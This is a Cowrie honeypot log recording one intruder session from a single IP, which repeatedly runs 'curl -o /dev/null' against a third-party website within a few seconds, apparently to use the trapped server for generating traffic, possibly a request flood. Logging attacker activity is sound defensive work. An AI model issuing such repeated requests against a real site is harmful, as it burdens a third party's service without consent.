{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:25.507792Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:25.544986Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:25.545973Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:25.582654Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:25.583950Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:25.620590Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:25.621479Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:25.658547Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:25.659598Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:25.700692Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:25.701654Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:25.746269Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:25.747391Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:25.789275Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:25.790179Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:25.838530Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:25.839707Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:25.891220Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:25.892221Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:25.936008Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:25.937962Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:25.977512Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:25.978578Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:26.026078Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:26.027081Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:26.075589Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:26.076813Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:26.121569Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:26.122532Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:26.163788Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:26.164783Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:26.201734Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:26.203343Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:26.242408Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:26.243454Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:26.302388Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:26.303431Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:26.353694Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:26.354843Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:26.398362Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:26.399420Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:26.439907Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:26.440952Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:26.480114Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:26.481154Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:26.518445Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:26.519605Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:26.556409Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:26.557703Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:26.594804Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:26.595528Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:26.633382Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:26.634425Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:26.671406Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:26.672782Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:26.720695Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:26.721838Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:26.760925Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:26.762017Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:26.800641Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:26.802587Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:26.852051Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:26.853312Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:26.896456Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:26.897683Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:26.939949Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:26.941134Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:26.980021Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:26.981183Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:27.018627Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:27.019636Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:27.057827Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:27.058990Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:27.102494Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:27.103772Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:27.156421Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:27.157421Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:27.197023Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:27.198159Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:27.241208Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:27.242126Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:27.279993Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:27.281149Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:27.318558Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:27.319499Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:27.356568Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:27.357613Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:27.605861Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:27.606856Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:27.676502Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:27.677465Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:27.714317Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:27.715288Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:27.752530Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:27.753572Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:27.810855Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:27.811821Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:27.848762Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:27.849766Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:27.903201Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:27.904654Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:27.968884Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:27.969907Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:28.030532Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:28.031629Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:28.074264Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:28.075554Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:28.121304Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:28.122314Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:28.158942Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:28.159877Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:28.199168Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:28.200373Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:28.239502Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:28.240483Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:28.287245Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:28.288258Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:28.328211Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:28.329516Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:28.367081Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:28.368268Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:28.405718Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:28.407025Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:28.448735Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:28.449810Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:28.487492Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:28.488605Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:28.525402Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:28.526715Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:28.587964Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
